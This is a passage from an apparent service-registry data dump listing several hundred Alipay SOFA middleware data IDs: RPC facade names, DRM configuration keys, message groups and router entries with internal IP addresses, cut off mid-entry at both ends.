ER","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:safeproductionportal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.socialTairCache.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gmodelcenter.common.service.api.system.CallGmodelApiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincontract.common.service.facade.FileTemplateManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antinvoice.biz.flow.service.isvorder.OrderInvoiceApplyBizService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthprod.facade.ActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.129#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.custinsight.common.service.facade.dispatch.CustinsightDispatchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findtprod.service.api.ResourceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rcdmncore.common.service.facade.api.ArchiveInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.holoxlib.core.sample.service.LinkCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instasset.common.service.facade.partner.LimitCardPartnerOrganizationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilerelation.common.service.facade.GroupRelationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.incomestatistics.facade.api.IncomeStatisticsDetailFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lightmds.service.uni.UniDataServiceFacade:1.0:ha@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.85.86#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.riskmng.common.service.facade.api.CaseEventService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finslip.biz.service.impl.mock.SlipTxnMock:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.v2.mining.facade.SentenceSegmentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfcenter.common.service.facade.ArBillConfirmationOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmng.common.service.facade.api.RiskmngComplainContentConsultCallBack:1.0:publiccoreRisk@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcheck.biz.service.impl.test.RuleNodeCheckerManageTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundselling.share.partner.PartnerManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicore.common.service.facade.rule.api.RuleQueryFacade:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.moaprod.common.service.facade.order.MoaOrderFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetpreference.api.facade.TimeSequenceDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.receipt.api.FreezeReceiptService:1.0:accordercore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icif.service.facade.apiv2.RelationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:sffgroup-radar@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","gfmdm@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:instservicecore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.SDKTest:name=com.alipay.dwebupload.client.drm.DomainConfig.djWarmUpDomain,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:prmplib@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.jdkSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promocenter.facade.api.DiscountActivityManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alcorporation.common.service.facade.api.AlCorpHumanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkmwalletMng_ProcessCallback1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditcore.loan.service.PcreditLoanOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilerelation.common.service.facade.tlou.TlouRelationV2Facade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.159.193.213#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.73.152.82#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finmobilemarket.common.service.facade.fintdop.ProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.240.37#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.delta.facade.api.ServiceCenterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxposition.service.facade.booking.TradeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promokernel.common.checker.facade.api.CertificateConsumeOrderCheckerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesync.common.service.spi.api.MobileSyncUpstreamSpiService:1.0:mcomment@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_FINORM#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.dsoc.service.facade.api.deployorder.VerifyResultFeedbackService:1.0:stable@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cap.common.service.tenant.CapTenantUserService:1.0:antcloud@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fluxconf.service.facade.ctrl.DataCacheRefreshService:1.0:fcfluxsetting@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:sofito_grayControl_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanrepayprod.common.service.facade.service.support.AssetClassFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.erecon.common.service.facade.query.api.ErcInstReconLogQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mychain.baas.common.user.service.ChainAccountManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.kbopenprod.common.service.facade.settlement.api.KbSettleQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.punishcenter.common.service.facade.process.ProcessTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.common.api.receipt.ReceivePayAckWithResultService:1.0:http@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.management.servicelibrary.ServiceLabelMngQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","insapportion@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.mybank.bkmerchantprod.common.service.facade.MerchantDrm2ClientFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.common.service.facade.common.management.McommentCommonManagementUpdateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.msg.PublicMsgFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.234.52#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.gotone.common.service.api.SendCardService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.openitemcore.common.service.facade.api.catalog.CatalogQueryFacade:1.0:APPXCORE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.igopcore.common.service.facade.api.contract.ContractTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.guardianWaterMark,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:acwareslifecore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.client.qaZQueue39#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA-SCHEDULER-S-S-adcenter-schedule#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.paycore.service.payment.asset.AssetFluxService:1.0:aeicoreAssetPrepareService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.giftprod.common.service.facade.inner.SendRemarkGzService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iglobalfundcontrol.common.config.api.MccTradeCategoryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custview.antg.facade.accesstoken.AgATKContactWayViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservindustryprod.common.service.facade.alsc.reservation.ExtActivityLeadsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:projectCheckAuditProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.integration.ctu.RiskAdvicePolicyClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.searchportal.common.service.facade.appcenter.SchAppDeployFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.maxBrandNameSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilelbs.common.service.facade.AAFindUserService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.biscenter.uem.common.service.facade.process.UEMProcessService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_B_ENT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mwealthprod.common.service.facade.SceneMsgQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininfo.common.service.facade.info.InfoSystemInvokeService:1.0:unitradeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.igpayrouter.common.service.facade.TradeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bcm.common.service.client.api.IbcmClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:new-compmng-compensationBizStatsSynCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:meshyserver@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ALIPAYANTBUSERVICESESSIONID.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_P_MERCHANT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.gfas.facade.api.RemitServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.paramcore.biz.service.interceptor.OssServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcloud.productcenter.common.service.facade.solution.SolutionPackageServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_VIRTUALPROD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ropcn.common.service.facade.api.RopFraudBizTaskInfoService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_O_DWDSPROD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchstm.common.service.facade.operation.facade.AssetReqOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoplaycenter.common.manage.facade.api.PlayGrayManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.aliinvoiceprod.common.service.facade.reimbursement.api.EinvPackageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.cifin:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.logLevelMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchdt.da.common.service.facade.api.HuabeiDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custcenter.service.facade.classification.ClassificationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mashup:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:ticket_msg_publisher@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.ipay.ilogin.common.service.facade.api.oauth.OAuthValidateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.giftprod.common.service.facade.inner.GiftCrowdActivityService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insptmarket.client.account.extension.AccountCardFetcherComponent:1.0:inshealthprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpdcore:name=com.alipay.fc.pdcore.common.util.drm.PsGrayDrm.skipOpenQueryServiceAbTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.certifymng:name=com.alipay.rule.core.publish.drm.RulePublishResource.enableHuffman,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.securitycap:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iotcore.spi.RpcSpi:1.0:tsm@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:iprofile@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:pvsofabootserver@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.vostroflux.service.spi.VostroValidateService:1.0:bkcloudfunds@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.environment.api.EnvironmentSupportService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.promocenter.facade.api.prototype2.ActivityInfoQueryCzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.pcinstmng.facade.api.instinfo.InstInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.tool.ConsumerServiceTool2Facade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbdatafactory.common.service.facade.datasource.LogicalDataSourceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizrecon.facade.RefundFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mydds:name=com.alipay.mydds.biz.shared.decision.drm.RecordSwitchResource.switchOn,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zqualitywalleetoe.common.service.facade.api.TestPlanManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.biz.shared.feature.template.DetectItem:1.0:instantGatherSensitiveInfoDetectItem@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_MDEVSUPPORT_MESSAGE_TASK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.pcardsales:name=com.alipay.cif.model.cache.CifCOControlSwitch.shadowReadCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ap.acquirefront.service.facade.api.AcquireOrderCaptureService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:merchantSignBasicValidator@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recadmin.biz.quality.manager.airCase.AirCaseRpcManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.management.aegis.AegisServConfigMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:prodswitch@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:inskgmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.disableImmune,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.88.63.179#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ebppgw.facade.TXRechargeQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.multimonitor.service.MmEventServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.antschedulerconsole.endpoint.openapi.rest.facade.JobOpenApiRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.creditcore.service.facade.trans.CreditInstructionFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:ifxposition@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.FundWebsiteAccountUpgradeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.HumanToHumanDrmResource.stopAuthorizeBudgetRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.adatabus.common.service.facade.MerchantQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antlogmng.common.service.facade.logmeta.LogMetaApprovalQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_AEICORE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcp.service.facade.isv.IsvVisitRecordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.service.facade.CodeImageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.19.29.96#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.insmobile:name=com.alipay.insmobile.biz.userhome.drm.UserHomeDRM.defaultRecommendProdIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.contentlib.common.service.facade.common.ResourceManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cstool.facade.api.DataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.socialTairCache.czoneSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.seekers.facade.apis.ProblemQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_EC_MOBILE_USER_WIDGET_MSG_EXPIRY_MWALLETMNG_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.167.172.207#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zappinfo:name=com.alipay.common.security.dresource.SecurityCommonDrm.xssJsonValueFilterEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iexratecenter.service.facade.api.ExClientRateMonitorConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.common.service.facade.common.AssetItemConfigurationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.livetradeprod.service.facade.api.ClientInvokeService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tairmanager.application.service.flow.devoffline.QueryRequestOffline:1.0:sandboxQueryRequestOffline@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkinstassetprod.common.service.facade.api.IaOutastFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.basic.article.facade.BasicArticleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatabus:name=com.alipay.zdatabus.common.agent.drm.ZdatabusClientTairRetryDRM.printLogRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insrisk.common.service.InsRiskInfoSecFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.runtimedatasrcmng.common.service.facade.api.patrol.rule.PatrolRuleManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.intimateprod.common.service.facade.api.liteuser.ChildPassportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.ap.bccomparacenter.facade.ComParaQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.charityprod.commom.service.facade.CharityReunionDataGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.impl.ExpressDrmTrigger.fundInpourFPChannelStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.unimetaservice.resource.facade.CellQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.auditprod.common.service.facade.fund.domain.QueryCategory:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.baitiaoprod:name=com.alipay.ambush.netmock.rule.NetmockRuleCoordinator.netmockRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.atd:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.defaultEncodeTestRunSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.opencommon.rcache.facade.RCacheNotifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.50.122.20#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mcomment.common.service.facade.backmanagement.CommentManagementUpdateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchdt.ai.common.service.facade.api.TaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mpromocenter.recruit.extension.service.facade.api.ItemExtensionQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.145.191#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.mif.common.service.facade.MerchantCardFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insiop.common.service.facade.evaluate.UserEvaluateMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.datafactory.DataFactoryTaskTrFacade:1.0:shopNoAndUKPaddingHandler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-insassetprod-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobileha.core.service.activity.ActivityControlDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.memberprod.common.service.account.register.LogonIdService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.statusbar.common.service.StatusbarFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:selfcurealipayse@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.certifymng:name=com.alipay.cif.drm.BizCertifyRuleGreySwitch.paramCenterUidRangeStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.custrelation.service.facade.family.FamilyRelationOperateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.thor.service.ThorRiskTypeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradeasyn.service.facade.TradeAsynQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.apshopcenter.common.service.facade.CategoryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.punishcenter.common.service.facade.StrategyService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.routeclient.DefaultRouteCoordinator.elasticRuleVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.aip.profit.schedule.calculate.drm.ProfitCalculateDRMResource.isAipProfitRateCache,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mbill.common.service.facade.MbillCustomerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.alplan.service.facade.SystemMenuFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.ptcore.common.service.facade.api.catalog.StandardCatalogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tairmanager.interfaces.endpoint.facade.rest.tair.ClusterUpgradeFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mfinsecu.common.service.facade.api.rank.QuotationRankManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.responseExceptionIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iotcore.spi.MessageSpi:1.0:admediamgr@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","membertangram@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.taskcenter.common.service.facade.callback.ProcessTaskCallback:1.0:fundTaskProcessCallBackApplication@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pvsofaclient.facade.rest.service.facade.rpc.route.viponlyenforce.VipOnlyEnforceRouteRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.fcbuservice.common.service.facade.manager.SyncManager:1.0:antacl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.1.58#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cap.common.i18n.facade.CapI18nService:1.0:internal_dmd@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.dataphin.openapi.ExecuteSqlService:1.0:dpide@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@vehownerprod#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.al